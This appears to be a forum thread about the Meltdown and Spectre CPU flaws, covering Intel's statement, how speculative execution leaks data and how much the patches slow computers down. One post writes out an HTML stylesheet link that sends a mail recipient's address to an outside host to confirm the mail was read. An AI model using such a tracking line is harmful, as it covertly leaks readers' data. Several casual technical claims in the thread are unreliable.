Jump to content

New found CPU bug could seriously downgrade performance for most of us


Azimech

Recommended Posts

12 minutes ago, PB666 said:

Dont get too excited. The conspiracy part comes in later after nepharious operators figure out how they can infiltrate your browser and steal your passwords one at a time.

Not to worry, there is always rasberry Pi..... for twenty five bucks you can play ubuntu on an 80386, which 27 years ago we thought was greatest thing since sliced bread.... or maybe a used copy of win 98 . . . . theres always the usenet, nntp servers, email. 

Doesnt seem to me thats its horribly diificult if you can program C you have access to assembly language subroutine functions. The question is what you will extract, because the read ahead stuff is typically not going to someones bank password. That program would have to find a way to get you to do something so that it can steal your password.

Note: all the bug can do is read, it can steal information from your machine, mostly machine informstion at that, probably 99.99%. 

Like all things its pretty easy once its explained, coming up with the idea however require some skill. 
Found one exploit myself once on random, this was after images on sites started to getting blocked by email clients because the images was used by spammers to verify that the mail was read.
Found that you could still use external CSS references, even better something like <link rel="stylesheet" href="http://mysite.com/[email protected]" > worked perfectly. 
This was over 10 years ago and has been patched but was till pretty funny. 

Link to comment
Share on other sites

32 minutes ago, Starman4308 said:

That is blatantly misleading. The actual statement:

"Recent reports that these exploits are caused by a “bug” or a “flaw” and are unique to Intel products are incorrect"

They're not saying it's not a problem, they're saying it's not unique to Intel. By chopping off the last half of the statement, you are effectively lying about what they said.

I wanted to stay out of it, but since you mention me directly and call me a liar: your emphasis is misleading.

"Recent reports that these exploits are caused by a “bug” or a “flaw” and are unique to Intel products are incorrect"

For those used to logic (and i think people here are ;-)) an "and" concatenates the two statements into a single. So, lets formulate this correctly:

"Recent reports that these exploits are caused by a “bug” or a “flaw” or are unique to Intel products are incorrect". That is true.

"Recent reports that these exploits are caused by a “bug” or a “flaw” are incorrect". That is false. (*)

"Recent reports that these exploits are unique to Intel products are incorrect". That is true.

Sorry, m8 ;-)

 

Edit: oh, wait: If you see this as a true statement, then we would have a case of that-what-we-shall-not-mention-here. Think about it. And that is what the article actually states.

Conspiracy is, by the way, not existent in many parts of the world. It is an American thing, legislation in many countries does not know it because too soft and too manipulative. You have omission or deceit, which is much easier to verify.

Edited by Green Baron
Link to comment
Share on other sites

every bit of silicon has bugs in it. they are designed by people and people sometimes screw up. people were talking about bugs in hardware in the 486 era and no doubt before even then. todays chips are much much much more complex and have more potential to conceal serious flaws.

Link to comment
Share on other sites

4 hours ago, Green Baron said:

tl,dr: Intel admits that sensitive data can be gathered from a processor that "works like designed". Intel furthermore claims that these are not design flaws. Draw your own conclusions.

Branch prediction is not a design flaw, because it is part of what makes our modern computers so fast. If it couldn't be used, it would cause a major speed loss to our modern cpus, probably much much larger and for more work loads than the up to 30% for the patches that mitigate Spectre. Unfortunately, I was unable to find just how large the loss would be, however modern processors are able to predict the correct branch with well over 90% success rate.

So Intel's claims can also be interpreted as them only wanting to introduce minor changes to branch prediction in future processors to maintain its speed gain, and instead use mitigation strategies in the OS and software to prevent branch prediction from being exploited. Of course, this means that Spectre will continue to haunt us for a long time, but at least we can keep our fast processors.

Of course, Intel also sends these claims forward to prevent lawsuits and calm down everyone, as even if they wanted to fix this problem in silicon, as this is no new Pentium bug (https://en.wikipedia.org/wiki/Pentium_FDIV_bug) where only small changes where required, but it would require us to rethink how our processors work.

Edited by Tullius
Link to comment
Share on other sites

5 hours ago, radonek said:

End of world. Really. People may be able to bump their CPUs to what silicone is capable of instead of what they paid for. What a horrible, horrible day.

I don't want to sound overly optimist, but agencies sure have cracked it long ago, SMM exploits are known for years, ring -3  access is already known… bad stuff happened already, now we are getting to good parts (begining with getting idea of how bad that bad stuff really is). Of course there is possibility that serious "in silicone" security issue will be found, but as we are seeing now, Intel can provide us with this kind of entertainment even without ME :-)

not the end of the world, maybe a new dark age. unless maybe the entity that hacks it happens to be skynet. 

i dont think there is much the me does about locking down performance, it might run some control loops for cooling devices (it certainly doesn't need unfettered drive and network access to do that job). having control over what it does would be nice. but imagine the botnet you could set up on the computers of people who didnt know to kill the me. i dont like black boxes in my computer. 

Edited by Nuke
Link to comment
Share on other sites

10 minutes ago, Tullius said:

Of course, Intel also sends these claims forward to prevent lawsuits and calm down everyone, as even if they wanted to fix this problem in silicon, as this is no new Pentium bug (https://en.wikipedia.org/wiki/Pentium_FDIV_bug) where only small changes where required, but it would require us to rethink how our processors work.

Or, in other words, and that is what the sarcastic article states, talk themselves out of it without taking over too much responsibility, just as little as legally possible. A well known pattern.

Btw., when i bought my last PC the faults were known. The 600 funds for processor and board could have been spent better.

Second try to take my leave, but somebody calls me a liar again i'll be back !

;-)

Link to comment
Share on other sites

16 minutes ago, Green Baron said:

Or, in other words, and that is what the sarcastic article states, talk themselves out of it without taking over too much responsibility, just as little as legally possible. A well known pattern.

Btw., when i bought my last PC the faults were known. The 600 funds for processor and board could have been spent better.

Second try to take my leave, but somebody calls me a liar again i'll be back !

;-)

In the context of Intel's statement about the bug, a single slightly errant half-sentence is enough for you to say "Intel is lying".

While Intel's chips are generally more vulnerable... your $600 would still not have bought a secure CPU from AMD, because everybody was to some extent affected by speculative execution flaws.

Edited by Starman4308
Link to comment
Share on other sites

24 minutes ago, Tullius said:

Branch prediction is not a design flaw, because it is part of what makes our modern computers so fast. 

Logical flaw: oversimplification of the problem. 

The problem is not anticipative computing specifically.

Let me give an analogy, when you look at a mirror you see a reflected image of yourself, but on the back view of a mirror is its private face, a whole different view of that mirror in fact from the back its not a mirror at all, but a very bumping non-lustrous coating of metal. In a good mirror design the user nevers sees the back of the mirror, they only see reflections and framing. 

IOW they can have process branches and chains but we should not see them or their spurious results. This is, no doubt, a design flaw. Its not a hardware 'bug' in the strictist sense, since the algorithm  operates as it should. But in a looser sense if part of the   processors job is to keep kernal protected state information 'rationed' to the user, then it is bugged from a security perspective. 

Link to comment
Share on other sites

30 minutes ago, Starman4308 said:

In the context of Intel's statement about the bug, a single slightly errant half-sentence is enough for you to say "Intel is lying".

While Intel's chips are generally more vulnerable... your $600 would still not have bought a secure CPU from AMD, because everybody was to some extent affected by speculative execution flaws.

There exists an exploit to read out every byte of kernel code mapped to user space [but restricted to "root"] in Intel processors.  This is called "meltdown" and an obviously critical issue.  Try finding a similar exploit that works with AMD processors, it might be vulnerable in theory but nobody has found a real weakness to exploit.  The bugfixes added to the Linux kernel are Intel specific and they aren't concerned with AMD at all (AMD uses steps in hardware to avoid this issue, and even have patents on it (which Intel can use thanks to cross-licensing)).

Speculative execution is absolutely necessary on modern machines, but it isn't remotely clear that such bugs will be dangerous.  Expecting a CPU to be free of all theoretical bugs is pretty much impossible, speculative or not: you can build a Turing-complete computer out of the Intel-architecture MMU (so presumably everything since the 386 is affected), but nobody has taken any steps to prevent an attack by that method.

Intel is simply claiming "everybody does it" when clearly only Intel made the huge mistake.

[edit: include link to KSP's source of all scientific and gameplay knowledge:] https://www.youtube.com/watch?v=d7ILCoU9d4k

Edited by wumpus
include youtube link
Link to comment
Share on other sites

5 hours ago, Nuke said:

not the end of the world, maybe a new dark age. unless maybe the entity that hacks it happens to be skynet.



Some of you might have heard of AlphaZero ... this AI taught itself chess in four hours, playing chess against itself 44 million times without traditional human input like openings and strategies.

And then it beat the best chess computer the world has ever known, Stockfish: 100 matches, 28 wins, 72 draws.

" This would be akin to a robot being given access to thousands of metal bits and parts, but no knowledge of a combustion engine, then it experiments numerous times with every combination possible until it builds a Ferrari. That's all in less time that it takes to watch the "Lord of the Rings" trilogy. The program had four hours to play itself many, many times, thereby becoming its own teacher. "

Scenario: go ahead you guys/gals, y'all have enough imagination ... that's what I expect from a KSP player visiting this part of the forum.

So I'm not saying this is bad or good. But it could be ... far sooner than we expected.

But I do think that an AI operating from a cloud is something to be avoided ... in case it starts to make philosophical questions ... I might give my life to pull the plug.

Then again ... where's the popcorn?

 

https://www.chess.com/news/view/google-s-alphazero-destroys-stockfish-in-100-game-match

Edited by Azimech
Link to comment
Share on other sites

And end of the world is canceled as usual.
https://gizmodo.com/spectre-and-meltdown-fixes-arent-actually-gonna-slow-ev-1821787555

Always assume everything from media is an clickbait the same way all adds try to sell you something.
Note that this is an issue then playing on fear and making everything far more serious than they are. 
Also note that this is older than internet. 

Link to comment
Share on other sites

On 01/04/2018 at 4:25 PM, Shadowmage said:

FUD - nothing but FUD.  (fear, uncertainty, doubt)

Actual performance impact for most user-related workloads is ~1%.  Gaming impacts are negligible.  (on either Intel or AMD)

http://www.tomshardware.com/news/meltdown-spectre-exploits-intel-amd-arm-nvidia,36219.html

(now, if you are running a virtualized datacenter, the performance impact is a bit more 'real'.... but then you should get back to work on patching your servers rather than reading this...)

I have an intel CPU that is ghugging along quite happily. How and why would these slow downs effect it? I have yet to see any noticable slowdown at all.

Link to comment
Share on other sites

2 hours ago, Majorjim! said:

I have an intel CPU that is ghugging along quite happily. How and why would these slow downs effect it? I have yet to see any noticable slowdown at all.

For video games that use DirectX communication with graphics processor is more direct so in game performance should be identical.

For KSP when you begin to load the game, every time the game picks a file, for example a parts file, it hits the input/output controller. In the old days of computing you could do this yourself directly using interrupt commands, however with new Protected State processor commands (present since the 386) you pretty much are forced by the OS to let the OS do it. In fact the last OS in which you could peak and poke around the operationg system was Windows Millenium. Since WinNT however and increasing with XP you have pretty much delegated all the crucial I/O stuff to the operating system.

The operating system is typically divided into two parts, the touchy feely stuff everyone is familiar with and the Kernal, which for all intents and purposes is invisible to the user, the kernal is the protected state. IOW it goes to the OS's Kernal and requests 'stuff'. Particularly text files, each time this happens the OS will need to create a dummy interface to the kernal that instructs the kernal what it wants, the kernal retrieves it and hands back control to the OS and has to erase the dummy interface, and which then hands back control to the program. So in KSP if you are like me and have as many models as the stock game has, you will probably see a significant slow down in the load times (since I also use SSD). If you make alot of parts and fine tune them in the game you will notice a slow-down in reloading the database. If the game uses alot of files added on the fly in the game, the game will slow down.

Now if you have one of these new on mainboard harddisk drives that does 10gb/s file transfer speeds and you been used to getting your stuff in a microsecond, you will probably see an effect more quickly than someone using a green drive running on the old 40 pin cables. (Since they are already slow).

Link to comment
Share on other sites

50 minutes ago, PB666 said:

For video games that use DirectX communication with graphics processor is more direct so in game performance should be identical.

For KSP when you begin to load the game, every time the game picks a file, for example a parts file, it hits the input/output controller. In the old days of computing you could do this yourself directly using interrupt commands, however with new Protected State processor commands (present since the 386) you pretty much are forced by the OS to let the OS do it. In fact the last OS in which you could peak and poke around the operationg system was Windows Millenium. Since WinNT however and increasing with XP you have pretty much delegated all the crucial I/O stuff to the operating system.

The operating system is typically divided into two parts, the touchy feely stuff everyone is familiar with and the Kernal, which for all intents and purposes is invisible to the user, the kernal is the protected state. IOW it goes to the OS's Kernal and requests 'stuff'. Particularly text files, each time this happens the OS will need to create a dummy interface to the kernal that instructs the kernal what it wants, the kernal retrieves it and hands back control to the OS and has to erase the dummy interface, and which then hands back control to the program. So in KSP if you are like me and have as many models as the stock game has, you will probably see a significant slow down in the load times (since I also use SSD). If you make alot of parts and fine tune them in the game you will notice a slow-down in reloading the database. If the game uses alot of files added on the fly in the game, the game will slow down.

Now if you have one of these new on mainboard harddisk drives that does 10gb/s file transfer speeds and you been used to getting your stuff in a microsecond, you will probably see an effect more quickly than someone using a green drive running on the old 40 pin cables. (Since they are already slow).

I appreciate the long answer but I am still unsure as to how this will affect me.. I have an intel CPU from a few years ago, I do not update windows and do not update drivers unless there is a game that has issues ect. How does this affect me? Will it not unless I download the new windows 'fix'? Or will it affect me anyway somehow?

Link to comment
Share on other sites

33 minutes ago, Majorjim! said:

I appreciate the long answer but I am still unsure as to how this will affect me.. I have an intel CPU from a few years ago, I do not update windows and do not update drivers unless there is a game that has issues ect. How does this affect me? Will it not unless I download the new windows 'fix'? Or will it affect me anyway somehow?

You will not observe a slowdown if you do not update.

You will also be vulnerable to Meltdown and Spectre attacks, which are very difficult to detect by classic antivirus techniques, because they run quite like normal programs. And yes, they can basically read any bit of information on your system that they want, including password information.

If you do update, there will be some hit to load times, possibly up to 30%, but once the game is loaded, there should be almost no issue, since the physics and rendering do not involve kernel calls.

Link to comment
Share on other sites

6 hours ago, Starman4308 said:

If you do update, there will be some hit to load times, possibly up to 30%…

Nah. It depends on application and will be hardly visible for desktop users . 30% figure cited was actually 5-30% range and I don't know of any CPU bound desktop app performing huge number of context switches. Certainly not any game, browser or office app.

Link to comment
Share on other sites

1 minute ago, radonek said:

Nah. It depends on application and will be hardly visible for desktop users . 30% figure cited was actually 5-30% range and I don't know of any CPU bound desktop app performing huge number of context switches. Certainly not any game, browser or office app.

Not during active gameplay, but possibly when loading assets there might be an issue.

I'm unsure, actually, on whether KSP's loading mechanic does do a lot of security context switches; if it loads each file separately, loading time will be worse than if it just stays in kernel space.

Link to comment
Share on other sites

8 hours ago, Majorjim! said:

I appreciate the long answer but I am still unsure as to how this will affect me.. I have an intel CPU from a few years ago, I do not update windows and do not update drivers unless there is a game that has issues ect. How does this affect me? Will it not unless I download the new windows 'fix'? Or will it affect me anyway somehow?

If you update, then it is very unlikely you will see any difference. Most experts believe that only database-intensive applications will suffer because of the huge number of OS calls they use and the way data can be randomly found buffered in RAM or on external drives. Most other applications (games, word processors, browsers etc) will suffer only tiny slowdowns. There was a fear that high-powered servers such as those used by Google will suffer badly when updated to be immune to these attacks, but Google now say that their servers are hardly affected by the updates. This makes it look increasingly as if we, the users, will see no problems from updating.

Link to comment
Share on other sites

On 1/5/2018 at 9:09 PM, magnemoe said:

And end of the world is canceled as usual.
https://gizmodo.com/spectre-and-meltdown-fixes-arent-actually-gonna-slow-ev-1821787555

Always assume everything from media is an clickbait the same way all adds try to sell you something.
Note that this is an issue then playing on fear and making everything far more serious than they are. 
Also note that this is older than internet. 

Use a script blocker, preferably one that doesn't show the image but the script its trying to load.

That click bait is also sometime malware.

Link to comment
Share on other sites

On 1/6/2018 at 5:10 AM, Majorjim! said:

I have an intel CPU that is ghugging along quite happily. How and why would these slow downs effect it? I have yet to see any noticable slowdown at all.

They don't, really, which was the point I was trying to make (re: the slowdowns effecting it).  Or rather, they do just as much as on any other desktop, which is to say, not much at all.  Below the thresholds of human perception.

This whole thing is getting blown way out of proportion, making national headlines.  When really its just another day in the tech business.  Exploit discovered, exploit getting patched; these almost always reduce performance (every single update/patch for windows usually does), but for some reason this one is a 'big deal'....

Its not (a big deal).

Link to comment
Share on other sites

On 1/5/2018 at 9:41 AM, Tullius said:

Branch prediction is not a design flaw, because it is part of what makes our modern computers so fast. If it couldn't be used, it would cause a major speed loss to our modern cpus, probably much much larger and for more work loads than the up to 30% for the patches that mitigate Spectre. Unfortunately, I was unable to find just how large the loss would be, however modern processors are able to predict the correct branch with well over 90% success rate

The raspberry pi uses a processor sufficiently weak to not use branch prediction and is not affected at all by this attack.  It gives you a good idea of how weak such a processor would be.

The problem isn't "using speculation is bad", but "allowing the effects of the paths that were incorrectly predicted [and thus should have all their effects rolled back] leak into the user-visible state".  This comes down to at least 2 paths:

Allowing the branch predictor to access memory it shouldn't.  It seems Intel [and ARM] "checks their privilege*" a wee bit late and allows operations that have been predicted to use privileged data that they shouldn't to fiddle with branch prediction.  Once this data has been cleared out, the effects of which branch predictions succeeded and failed are still visible.

Allowing the branch predictor to update with data that "shouldn't exist".  Rolling back all speculated operations after mispredicting branches is a real pain, and rolling back the branch prediction updates not only suffers that pain but also loses data (and thus makes branch prediction miss more often).  But it turns out that it may be possible to use the data leaned from the mispredictions to determine what happened on data that shouldn't be accessed.

You should be able to fix these with a limited performance hit.  It will take plenty of engineer-hours to get it done (for Intel and ARM, AMD may have already done most of it).

A few notes on conspiracy and Intel:

This looks more like a cost-cutting scandal than anything else.  AMD presumably noticed a similar potential flaw, patented a fix, and shipped processors immune to much of this issue.  The catch for Intel (unlike ARM) is that they have a patent cross-licensing deal with AMD and presumably some Intel intern tasked with grepping the list of new patents for "AMD" would have noticed the patent and spread it around to the appropriate engineers.  As far as we know, Intel has only themselves to blame (for at least being not as resistant to this as AMD).

Intel has been known to act in ways that appear indistinguishable from conspiratorial acts.  The hardware RNG in Intel processors has the peculiar property that it appears designed to produce 64 bit random numbers when "correctly" manufactured but via simple process changes can produce only 16 bits of true randomness.  This is a problem as it is fundamentally impossible to determine from the output just how much "randomness" you have (unless you know the process changes made to produce the chip).  After this was discovered, pretty much all users of random numbers stopped using Intel's RDRAND instructions.  Note that it must be far easier to discover vulnerabilities in Windows/iOS/Android/browsers than to bake weird faults into hardware: this is almost certainly a cost cutting measure (getting privilege escalations is easy, the RDRAND is an amazingly useful target and might actually be a threat).

And speaking of conspiracies, the infamous DUAL_EC_PRNG random number generator (basically used by the NSA as a backdoor to listen into anybody foolish enough to use software based on that algorithm) manged to cause a printer driver bug: https://blog.cryptographyengineering.com/2017/12/19/the-strange-story-of-extended-random/

* the user is trying to see root's (the administer) code/data.  They aren't supposed to have that privilege and the "check" should fail.  Sorry about the bad joke.

Link to comment
Share on other sites

Having done a lot of reading and YouTube watching to find out more about these exploits, I'm amazed anybody even realised they existed. To use the exploits takes a lot of very real cunning. Similarly, I am not at all surprised these exploits exist. There is no way an engineer could have predicted that these techniques were possible. After all - it took ten years before some bright spark realised the exploit existed. Because of this, I am now firmly signed on to the "[snip] happens" hypothesis in this instance rather than the conspiracy theory or even the "people are dumb" explanation.

Edited by Gargamel
Portions Redacted by Moderator
Link to comment
Share on other sites

This thread is quite old. Please consider starting a new thread rather than reviving this one.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...